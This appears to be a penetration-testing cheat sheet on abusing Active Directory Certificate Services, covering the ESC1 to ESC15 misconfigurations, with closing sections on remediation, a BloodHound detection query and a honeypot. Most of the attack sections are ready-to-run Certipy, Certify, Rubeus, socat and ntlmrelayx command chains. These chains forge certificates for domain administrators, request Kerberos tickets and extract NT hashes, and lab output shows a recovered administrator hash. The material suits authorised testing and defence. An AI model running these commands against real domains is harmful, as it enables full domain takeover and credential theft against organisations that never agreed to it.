AD CS

PKI ?

nxc ldap <ip> -u user -p pass -M adcs

Exploit ESC8 (ADCS) | NetExecwww.netexec.wiki

Or run PingCastle or Certify

ESC

Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable MessLogan Goins

Escalation	Definition
ESC1	Enrolee can request cert for ANY user
ESC2	Any purpose or no EKU (potentially dangerous)
ESC3	Request an enrollement agent certificate and use it to request cert on behalf of ANY user
ESC4	Overly permissive ACLs on templates
ESC5	Poor access control on CA server, CA server computer object, etc.
ESC6	EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user
ESC7	Poor access control on roles on CA authority like "CA Administrator" and "Certificate Manager"
ESC8	NTLM relay to HTTP enrollement endpoints

NXC

Vulnerable Template

nxc smb IP -u user -d domain.local -p password -M enum_ca

Masky

If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT

Source: https://x.com/mpgn_x64/status/1584863925744521216

Tools

Locksmith

GitHub - jakehildreth/Locksmith: A small tool built to find and fix common misconfigurations in Active Directory Certificate Services.GitHub

# Run all scans
Invoke-Locksmith -Scan All

Certify

GitHub - GhostPack/Certify: Active Directory certificate abuse.GitHub

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/Certify.exegithub.com

ADCS Attacks with Certipyserioton

Enumeration

AD CS in the target forest

Certify.exe cas

Templates

Certify.exe find

Vulnerable templates

Certify.exe find /vulnerable

Certi

GitHub - zer1t0/certi: ADCS abuserGitHub

$ certi.py list 'contoso.local/Han' -k -n --dc-ip 192.168.100.2 --vuln --enable | grep ESC3 -B 3
Name: User
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: Administrator
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate

Certipy

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

The Future of Certipy and the Release of v5 & ESC16 · ly4k Certipy · Discussion #270GitHub

Vulnerable template

# certipy find -u ca_operator -p NewPassword0xss0rz -dc-ip 10.10.11.41 -vulnerable -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'domain-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'domain-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'domain-DC01-CA'
[*] Saved BloodHound data to '20241126073356_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241126073356_Certipy.txt'
[*] Saved JSON output to '20241126073356_Certipy.json'

 # cat 20241126073356_Certipy.txt | grep ESC
      ESC9                              : 'DOMAIN.HTB\\operator ca' can enroll and template has no security extension
 
 # cat 20241126073356_Certipy.txt

PSPKIAudit

Only ESC1 to ESC8

GitHub - GhostPack/PSPKIAudit: PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.GitHub

Metasploit

Attacking AD CS ESC Vulnerabilities Using MetasploitMetasploit Documentation Penetration Testing Software, Pen Testing Security

ADCSKiller

GitHub - grimlockx/ADCSKiller: An ADCS Exploitation Automation Tool Weaponizing Certipy and CoercerGitHub

Practice and explanation

GitHub - arth0sz/Practice-AD-CS-Domain-Escalation: Introductory guide on the configuration and subsequent exploitation of Active Directory Certificate Services with Certipy. Based on the white paper Certified Pre-Owned.GitHub

GOAD - part 6 - ADCSMayfly

ESC1

This attack consists of adding an arbitrary subject to a certificate.

Abusing Active Directory Certificate Services (Part 1) - Black Hills Information Security, Inc.Black Hills Information Security, Inc.

Penetration Testing & Cybersecurity Experts | RBT SecurityRBT Security | Reinventing The Security

"VulnTemplate" has ENROLLEE_SUPPLIES_SUBJECT value for msPKI-Certificates-Name-Flag

Certify.exe find /enrolleeSuppliesSubject

"VulnTemplate" allows enrollment to RDPUsers group.

1. Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"VulnTemplate" /altname:administrator

1. Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:passw0rd /ptt

Linux - Certipy

# certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl'

If Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template, Go back to the certipy find result and get the RSA Key Length. Append it to the command: -key-size

# certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl' -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'Administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

# certipy auth -pfx administrator.pfx 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

vulnlab-retroPuckieStyle

Kerberos error : « Object SID mismatch between certificate and user »

To fix this, you can specify an alternative subject SID using the -SID option.

$ certipy req -u "user@domain.local" -p password -dc-ip [IP] -target "Target_IP] -ca 'ADCS-name' -template 'ESC1' -upn administator@domain.local -sid [Certificate_object_SID]

$ certipy auth -pfx administrator.pfx -dc-ip [IP] -debug

ESC2

Abusing Active Directory Certificate Services (Part 4) - Black Hills Information Security, Inc.Black Hills Information Security, Inc.

Find vulnerable templates

certipy find -u 'bspears' -p REDACTED -dc-ip 10.10.0.10 -vulnerable -enabled 

Exploit

certipy-ad req -u 'bspears' -p 'REDACTED' \ 
-dc-ip '10.10.0.10' \ 
-target 'dc01.foobar.com' \ 
-ca 'foobar-CA' \ 
-template 'ESC2_User'-debug 

certipy-ad req -u 'bspears' -p 'REDACTED' -dc-ip '10.10.0.10' \ 
-target 'dc01.foobar.com'  
-ca 'foobar-CA' \ 
-template 'User' \ 
-on-behalf-of 'example\administrator' \ 
-pfx bspears.pfx -debug 

ESC3

Request an enrollement agent certificate and use it to request cert on behalf of ANY user

Active Directory Certificate Services (ADCS – ESC3) | RBT SecurityRBT Security | Reinventing The Security

Abusing Active Directory Certificate Services (Part 4) - Black Hills Information Security, Inc.Black Hills Information Security, Inc.

"VulnTemplateEnrollement-Agent" allows Domain users to enroll and has 'Certificate Request Agent' EKU

"VulnTemplateEnrollement-Users" has an Application Policy Issuance Requirement of Certificate Request Agent and has an EKU that allows for domain authentication

Escalation to DA

child.parent.local: child domain

parent.local: parent domain

1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Agent

1. Convert cert.pem to pfx and use it to request a cert on behalf on DA using "VulnTemplateEnrollement-Users"

openssl.exe pkcs12 -in C:\path\to\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3agent.pfx 

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:child\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

1. Convert from cert.pem to pfx, request DA TGT and inject it

openssl.exe pkcs12 -in C:\path\to\DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3user-DA.pfx  

Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:passw0rd /ptt

Escalation to EA

1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template - see Escalation to DA

2. Convert cert.pem to pfx and use it to request a cert on behalf on EA using "VulnTemplateEnrollement-Users

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:parent.local\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

1. Request EA TGT and inject it

Rubeus.exe asktgt /user:parent.local\administrator /certificate:esc3user-EA.pfx /dc:dc.parent.local /password:passw0rd /ptt

ESC4

Abusing Active Directory Certificate Services (Part 2) - Black Hills Information Security, Inc.Black Hills Information Security, Inc.

certipy template -u billy@foobar.com -p REDACTED -template ESC4Certificate_FOOBAR -dc-ip <DC_IP> -save-old

certipy req -u 'billy@foobar.com' -p 'REDACTED' -dc-ip '10.10.1.100' -target 'foobar-CA.foobar.com ' -ca 'foobar-CA' -template 'ESC4Certificate_FOOBAR' -upn 'DA_Dan@foobar.com' 

certipy auth -pfx DA_Dan.pfx

Clean up

certipy template 
-u user@foobar.com \
-p REDACTED \
-template ESC4Certificate_FOOBAR \
-dc-ip <DC_IP> \
--configuration 'ESC4Certificate_FOOBAR.json'

ESC6

EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user from a template that allow enrollment to low-priv user

Active Directory Certificate Attack (ADCS – ESC6) | RBT SecurityRBT Security | Reinventing The Security

"Vuln-Integration" grants enrollment to RDPUsers group.

1. Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"Vuln-Integration" /altname:administrator

1. Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:passw0rd /ptt

ESC8 - PetitPotam

Abusing Active Directory Certificate Services (Part 3) - Black Hills Information Security, Inc.Black Hills Information Security, Inc.

NTLM relay to HTTP enrollement endpoints

Release PetitPotato · wh0amitz/PetitPotatoGitHub

Domain Escalation: PetitPotam NTLM Relay to ADCS EndpointsHacking Articles

Windows Exploit

ESC9

Certificate templates | The Hacker Recipeswww.thehacker.recipes

https://adminions.ca/books/abusing-active-directory-certificate-services/page/esc9adminions.ca

Certifried - CVE-2022-26923

Exploiting Certifried (CVE-2022-26923) | CravateRouge LtdCravateRouge Ltd

Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923)Medium

ADCSCoercePotato

GitHub - decoder-it/ADCSCoercePotatoGitHub

Hello: I’m your ADCS server and I want to authenticate against youDecoder's Blog

On the attacker system:

socat TCP-LISTEN:135,reuseaddr,fork TCP:<TARGET-IP>:9999

On a domain-joined system:

ADCSCoercePotato.exe -m <REMOTE-DCOM-SERVER/ADCS-SERVER> -k <IP-ADDRESS-SOCAT-REDIRECTOR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -c D99E6E74-FC88-11D0-B498-00A0C90312F3

Relay with ntlmrelayx.py to the ADCS Web enrollment Endpoint:

impacket-ntlmrelayx -t http://<ADCS-WEB-ENROLLMENT-IP/FQDN>/certsrv/certrqus.asp --adcs --template <TEMPALTE-NAME/machine> -smb2support

r-tec Blog | Windows is and always will be a Potatolandwww.r-tec.net

RemoteKrbRelay

GitHub - CICADA8-Research/RemoteKrbRelay: Remote Kerberos Relay made easy! Advanced Kerberos Relay FrameworkGitHub

RemoteKrbRelay.exe -adcs -template domaincontroller -target <FQDN-DC.DOMAIN.COM> -victim <FQDN-VICTIM.DOMAIN.COM> -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

CertPotato

SensePost | CertPotato – Using ADCS to privesc from virtual and network service accounts to local systemsensepost.com

KrbRelay-SMBServer

GitHub - decoder-it/KrbRelay-SMBServerGitHub

Network Attacks

ESC14

GitHub - logangoins/Stifle: .NET Post-Exploitation Utility for Abusing Strong Explicit Certificate Mappings in ADCSGitHub

ADCS ESC15 (EKUwu) - CVE-2024-49019

The TrustedSec team tested the CVE-2024-49019 vulnerability across multiple clients, finding that 10 out of 15 environments were at risk

Zero-Day in Active Directory Certificate Services: Researcher Exposes CVE-2024-49019 with PoCDaily CyberSecurity

Detection: Bloodhound query

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

Credit: @SpecterOps

Exploitation

EKUwu: Not just another AD CS ESCTrustedSec

Curious case of AD CS ESC15 vulnerable instance and its manual exploitationwww.mannulinux.org

From Child to Forest

GitHub - MWR-CyberSec/AD-CS-Forest-Exploiter: Exploit AD CS misconfiguration allowing privilege escalation and persistence from any child domain to full forest compromiseGitHub

Relay Attack on WinReg RPC Client

Call and Register — Relay Attack on WinReg RPC Client | AkamaiAkamai

akamai-security-research/PoCs/cve-2024-43532 at main · akamai/akamai-security-researchGitHub

Remediation

Defending Your Directory: An Expert Guide to Fortifying Active Directory Certificate Services (ADCS) Against Exploitationwww.nccgroup.com

GitHub - Sleepw4lker/TameMyCerts: Policy Module for Microsoft Active Directory Certificate ServicesGitHub

Securing AD CS: Microsoft Defender for Identity's Sensor Unveiled | Microsoft Community HubTECHCOMMUNITY.MICROSOFT.COM

The following security controls should be implemented to mitigate an ESC1 AD CS compromise:

• Remove the Enrolee Supplies Subject flag. Do not allow users to provide their own SAN in the certificate signing request for templates configured for client authentication. Templates configured with the Enrolee Supplies Subject flag allow a user to provide their own SAN.

• Restrict standard user object permissions on certificate templates. Standard user objects should not have write permissions on certificate templates. User objects with write permissions may be able to change enrolment permissions or configure additional settings to make the certificate template vulnerable.

• Remove vulnerable AD CS CA configurations. Ensure that the CA is not configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. When configured, this allows a SAN to be provided on any certificate template.

• Require CA Certificate Manager approval for certificate templates that allow the SAN to be supplied. This ensures certificate templates that require CA certificate manager approval are not issued automatically when requested; instead, they must be approved using certificate manager before the certificate is issued.

• Remove EKUs that enable user authentication. This prevents malicious actors from exploiting the certificate to authenticate as other users.

• Limit access to AD CS CA servers to only privileged users that require access. This may be a smaller subset of privileged users than the Domain Admins security group and reduces the number of opportunities for malicious actors to gain access to CA servers.

• Restrict privileged access pathways to AD CS CA servers to jump servers and secure admin workstations using only the ports and services that are required for administration. AD CS servers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.

• Only use AD CS CA servers for AD CS and do not install any non-security-related services or applications. This reduces the attack surface of AD CS CA servers as there are fewer services, ports and applications that may be vulnerable and used to compromise an AD CS CA server.

• Encrypt and securely store backups of AD CS CA servers and limit access to only Backup Administrators. Backups of AD CS CA servers need to be afforded the same security as the actual AD CS CA servers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as AD CS CA servers.

• Centrally log and analyse AD CS CA server logs in a timely manner to identify malicious activity. If malicious actors gain privileged access to a CA server, this activity should be identified as soon as possible to respond and limit the impact.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Detection

ADCS Honeypot

Detection

GitHub - srlabs/Certiception: An ADCS honeypot to catch attackers in your internal network.GitHub

Resources

Certified Pre-Owned - SpecterOpsSpecterOps